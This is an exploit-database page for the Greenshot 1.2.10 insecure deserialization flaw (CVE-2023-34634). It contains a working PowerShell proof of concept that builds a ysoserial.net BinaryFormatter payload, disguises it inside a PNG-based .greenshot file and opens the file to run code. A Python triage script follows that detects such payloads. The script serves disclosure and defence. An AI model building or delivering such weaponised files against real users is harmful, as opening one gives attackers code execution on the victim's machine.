GreenShot 1.2.10 – Insecure Deserialization Arbitrary Code Execution

  • Author: p4r4bellum
    Date: 2023-07-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51633/
  • # Exploit Title: GreenShot1.2.10 - Insecure Deserialization Arbitrary Code Execution
    # Date: 26/07/2023
    # Exploit Author: p4r4bellum
    # Vendor Homepage: https://getgreenshot.org
    # Software Link: https://getgreenshot.org/downloads/
    # Version: 1.2.6.10
    # Tested on: Windows 10.0.19045 N/A build 19045
    # CVE : CVE-2023-34634
    #
    # GreenShot 1.2.10 and below is vulnerable to insecure object deserialization in its custom *.greenshot format.
    # A stream of .NET objects is serialized into the file and insecurely deserialized (BinaryFormatter) when a *.greenshot file is opened with the software.
    # On a default install the *.greenshot file extension is associated with the program, so double-clicking a *.greenshot file
    # leads to arbitrary code execution in the context of the user who opened it.
    #
    # Generate the payload. You need ysoserial.net installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
    ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw
    # load the payload as raw bytes (-Encoding Byte is Windows PowerShell 5.1 syntax; on PowerShell 7 use -AsByteStream instead)
    $payload = Get-Content .\payload.bin -Encoding Byte
    # retrieve the length of the payload
    $length = $payload.Length
    # load the required assembly to craft a PNG file
    Add-Type -AssemblyName System.Drawing
    # the following lines create a PNG file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
    $filename = "$home\poc.greenshot"
    $bmp = new-object System.Drawing.Bitmap 250,61 
    $font = new-object System.Drawing.Font Consolas,24 
    $brushBg = [System.Drawing.Brushes]::Green 
    $brushFg = [System.Drawing.Brushes]::Black 
    $graphics = [System.Drawing.Graphics]::FromImage($bmp) 
    $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) 
    $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) 
    $graphics.Dispose() 
    $bmp.Save($filename) 
    
    # append the serialized payload to the PNG file (the PNG must stay first so the file still renders as an image)
    $payload | Add-Content -Path $filename -Encoding Byte -NoNewline
    # append the length of the payload as a little-endian 64-bit integer
    [System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
    # append the format signature; Greenshot uses it to find the trailer when the file is opened
    "Greenshot01.02" | Add-Content -Path $filename -NoNewline -Encoding Ascii
    # launch Greenshot via the file association. calc.exe should be executed
    Invoke-Item $filename
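
The PoC above writes a file with a fixed trailer layout: PNG image, serialized .NET object stream, an int64 payload length, then the ASCII signature "Greenshot01.02". The following Python script is an added example (not part of the original exploit or of Greenshot) that parses that layout from the end of the file, recovers the embedded object stream, and checks two things a responder would want: whether the stream begins with the BinaryFormatter SerializationHeaderRecord defined in MS-NRBF (RecordType 0, RootId 1, HeaderId -1, version 1.0), and whether it carries type names typical of ysoserial.net gadgets such as the WindowsIdentity chain used above. The gadget marker list is a heuristic assumption, not a complete list, and the sample files are constructed in-line; the bytes after the header are not a valid NRBF body, they only exercise the parser. Every .greenshot file carries a BinaryFormatter stream by design, so the header alone is not an indicator of compromise; the gadget markers and an unexpected payload size are.

```python
import struct

# Trailer layout as written by the PoC on this page:
#   <PNG bytes><payload><int64 little-endian payload length><"Greenshot01.02">
SIGNATURE = b"Greenshot01.02"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# SerializationHeaderRecord of a .NET BinaryFormatter stream (MS-NRBF 2.6.1):
# RecordType=0, RootId=1, HeaderId=-1, MajorVersion=1, MinorVersion=0
BINARYFORMATTER_HEADER = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00"

# Heuristic indicators (assumption): class names that appear in clear text inside
# streams produced by common ysoserial.net BinaryFormatter gadgets. Not exhaustive.
GADGET_MARKERS = [
    b"System.Security.Principal.WindowsIdentity",   # WindowsIdentity gadget (used by the PoC)
    b"System.Security.Claims.ClaimsIdentity",       # ClaimsIdentity gadget
    b"System.DelegateSerializationHolder",          # TypeConfuseDelegate gadget
    b"System.Runtime.Remoting.Messaging.ObjRef",    # ObjRef-based chains
]


def split_greenshot(data: bytes):
    """Split a .greenshot file into (png_bytes, payload_bytes) using the trailer.

    Raises ValueError when the trailer is missing or the length field is inconsistent,
    which is exactly the case a hardened parser should refuse rather than guess.
    """
    if not data.endswith(SIGNATURE):
        raise ValueError("missing Greenshot trailer signature")
    body = data[:-len(SIGNATURE)]
    if len(body) < 8:
        raise ValueError("file too short to hold a payload length field")
    (length,) = struct.unpack("<q", body[-8:])
    body = body[:-8]
    if length < 0 or length > len(body):
        raise ValueError(f"payload length {length} out of range for {len(body)} bytes")
    cut = len(body) - length
    return body[:cut], body[cut:]


def triage_greenshot(data: bytes) -> dict:
    """Return a dict describing what the file's trailer contains."""
    result = {
        "is_greenshot": False, "png_ok": False, "payload_len": 0,
        "binaryformatter": False, "gadget_markers": [], "reason": "",
    }
    try:
        png, payload = split_greenshot(data)
    except ValueError as exc:
        result["reason"] = str(exc)
        return result
    result["is_greenshot"] = True
    result["png_ok"] = png.startswith(PNG_MAGIC)
    result["payload_len"] = len(payload)
    result["binaryformatter"] = payload.startswith(BINARYFORMATTER_HEADER)
    result["gadget_markers"] = [m.decode() for m in GADGET_MARKERS if m in payload]
    return result


def build_greenshot(png: bytes, payload: bytes) -> bytes:
    """Assemble a file with the same trailer the PoC appends (used here to build test input)."""
    return png + payload + struct.pack("<q", len(payload)) + SIGNATURE


# Constructed sample inputs. FAKE_PNG is only a magic number plus filler, not a real image,
# and the payload bodies after the header are not valid NRBF records.
FAKE_PNG = PNG_MAGIC + b"\x00" * 32
BENIGN_PAYLOAD = BINARYFORMATTER_HEADER + b"\x0c\x02\x00\x00\x00" + b"Greenshot" + b"\x0b"
MALICIOUS_PAYLOAD = (BINARYFORMATTER_HEADER + b"\x0c\x02\x00\x00\x00" + b"mscorlib"
                     + b"System.Security.Principal.WindowsIdentity" + b"\x0b")

if __name__ == "__main__":
    for name, payload in (("benign", BENIGN_PAYLOAD), ("ysoserial-like", MALICIOUS_PAYLOAD)):
        print(name, triage_greenshot(build_greenshot(FAKE_PNG, payload)))
    print("plain png", triage_greenshot(FAKE_PNG))
```

To run it over a real sample, read the file in binary mode and pass the bytes to `triage_greenshot`; a `payload_len` that is orders of magnitude larger than a typical annotation set, or any non-empty `gadget_markers`, is worth pulling the file for deeper analysis with a proper NRBF parser rather than trusting the substring heuristic either way.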